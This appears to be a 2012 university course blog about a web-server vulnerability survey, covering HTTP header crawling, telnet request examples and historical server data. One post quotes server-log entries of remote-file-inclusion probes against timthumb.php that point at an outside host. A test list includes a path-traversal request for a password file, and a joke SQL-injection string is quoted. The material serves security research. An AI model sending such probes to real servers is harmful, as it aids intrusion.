Rice University logo
 
Top blue bar image
Or looking for known, fixed vulnerabilities on servers that should know better (and several that shouldn't)
 

Archive for October, 2012


First Steps

October 20th, 2012 by Tad

So we now have a primitive spider working!  You can see our code, which uses the Scrapy toolkit, at: https://github.com/tbook/comp527-serversurvey  Pretty ugly at this point, but hopefully we will have something nice by the end of the semester.

We made an initial attempt to crawl the Alexa top 500 and gather some basic data from the server headers.  You can see a survey of our initial results here.

Discovering all of the interesting headers sent back by the servers that we encountered prompted a slight change in our methodology – we will log all server headers, which will allow us to assemble a fairly complete directory of what headers are in use, and use them to classify servers.  We will also examine the date stamps to survey how many servers have the date correctly configured.

Some initial insights:

  • It seems that many servers are (understandably) guarded about sharing version information.  Many servers don’t give the version, and some don’t even share the name of the server.  Several return the helpful string “server”, or “confidential”
  • There is quite a variety of servers “in the wild.”  Apache has the largest share, but we observed the following other servers, as well: aris, BWS, GSE, gws, IBM, lighttpd, Microsoft-IIS, nginx, Netscape, PWS, Sun-Java-System-Web-Server, Tengine, and others.
  • Reddit.com seems to be trying a SQL exploit.  Their server string is: “‘; DROP TABLE servertypes; –“
  • Roughly 3/4 of servers provide charset information, which varies widely, with UTF-8 being the most common, but ISO-8859-1, GB2312, GBK, windows-1251, windows-1256, EUC-JP, EUC-KR, Shift_JIS, and Big5 also appearing.  gsmarena.com uses “None” for it’s charset, apparently giving you the freedom to interpret their content in the way that you find personally most satisfying.

That’s where we are right now.  Look for more updates in the coming weeks!

The HTTP Protocol

October 10th, 2012 by Tad

I have been looking over the HTTP Protocol version 1.1 (http://www.w3.org/Protocols/rfc2616/rfc2616.html) in order to try to get a sense of what parameters we should measure.  The first thing that I have observed is that the data that the server sends back depends on how we make the request.  Here are some examples from the Rice web server:

With no protocol specified, no headers are returned:

tbook@Athanasius:~$ telnet www.rice.edu 80
Trying 128.42.204.11...
Connected to www.netfu.rice.edu.
Escape character is '^]'.
GET /robots.txt
# Robot-exclusion file for chico.

With HTTP/1.0, we get a variety of headers

GET /robots.txt HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 19:30:51 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

With HTTP 1.1, we get an error (as expected) on our incomplete request

GET /robots.txt HTTP/1.1
HTTP/1.1 400 Bad Request
Date: Wed, 10 Oct 2012 19:31:59 GMT
Server: Apache/2.2.12 (Unix)
Vary: Accept-Encoding
Content-Length: 226
Cneonction: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

If we give a complete request, we receive (nearly) the same headers

telnet> toggle crlf
Will send carriage returns as telnet <CR><LF>.
telnet> open www.rice.edu 80
Trying 128.42.204.11...
Connected to www.netfu.rice.edu.
Escape character is '^]'.
GET /robots.txt HTTP/1.1
User-Agent: Telnet
Host: www.rice.edu
Accept: text/html
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 20:04:41 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

The Accept field seems to be ignored:

GET /robots.txt HTTP/1.0
Accept: text/html
HTTP/1.1 200 OK
Date: Wed, 10 Oct 2012 19:44:00 GMT
Server: Apache/2.2.12 (Unix)
Last-Modified: Thu, 27 May 2004 16:39:15 GMT
ETag: "2aa0f0-73f-3db6aa1a392c0"
Accept-Ranges: bytes
Content-Length: 1855
Vary: Accept-Encoding
X-Forwarded-Server: WWW1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/plain
# Robot-exclusion file for chico.

Other parts of the protocol seem not to be implemented:

Connected to www.netfu.rice.edu.
Escape character is '^]'.
OPTIONS
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
 "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<title>Server error!</title>
...

Here is an initial list of some things we may want to test:

  • HTTP Version
  • Content type
  • Character set
  • Partial and conditional gets
  • Accept
  • Expect
  • TE (Transfer Encoding request)
  • Upgrade
  • HTTP GET / HEAD / OPTIONS / TRACE
  • Response of servers to various / malformed requests (both HTTP 1.0 and 1.1)
  • Behavior when a relative URL is requested; eg. GET /../etc/passwords

Other things would be interesting to test, but probably impractical, as they would require knowing a path to a resource of the appropriate type (which may not exist on the server)

  • Content Coding
  • Transfer Coding
  • Http PUT / POST / DELETE

				

Some Historical Data

October 10th, 2012 by Tad

I recently came across some historical data on server versions and updates that may be useful for our project.  In a survey of drive-by downloads (Niels Provos, Panayiotis Mavrommatis, Moheeb Rajab, Fabian Monrose. All Your iFrames Point to Us, 17th USENIX Security Symposium, (San Jose, CA, Aug. 2008).), the authors included the following data regarding some servers as of mid 2008:

Srv. Software count Unknown Up-to-date Old
Apache 55,088 26.5% 35.5% 38%
Microsoft IIS 113,905  n/a n/a n/a
Unknown 12,706 n/a n/a n/a

This data is only for servers that served as landing sites for malware distribution, and so it can’t be taken as representative of servers at the period. Still, it does provide a snapshot of the servers that were open to exploits at the time.

We aren’t the only ones surveying web servers!

October 8th, 2012 by Tad

Today, I had an interesting reminder that we are not the only ones surveying web servers. I was looking at the server logs for librivox.bookdesign.biz, a server that provides a web interface into the database that I use for my LibriVox AudioBooks android app.  As it turns out, there were a few interesting requests that produced 404 errors.  Here they are, below:

184.107.145.18 - - [05/Oct/2012:08:42:27 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/idss.php HTTP/1.1"
404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=3 cpu_ms=0
184.107.145.18 - - [05/Oct/2012:08:42:25 -0700] "GET /wp-content/themes/aquitaine/lib/custom/timthumb.php?src=http://blogger.com.arztree.com/petx.php HTTP/1.1"
404 0 - "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "librivox.bookdesign.biz" ms=4 cpu_ms=0 

As it turns out, timthumb.php is a WordPress image resizing utility that has a security vulnerability that allows for arbitrary file uploads.  You can read about the weakness on the sucuri blog.  Of course, it’s no surprise that malicious agents are surveying web servers for vulnerabilities.  It’s just interesting to see it happening in practice.  Had my server used the offending library, I could now be hosting drive by downloads for some botnet.

I didn’t take the time to thoroughly investigate 184.107.145.18 or arztree.com (The ip address points to a server hosted by iweb.com in Canada, and the domain is registered in Taiwan,) as I think it is safe to assume that the trail of any potential attacker will likely be well covered.  Still, the fact of the probing is a reminder that our survey in some way will mirror the efforts of various agents looking for weaknesses in web infrastructure.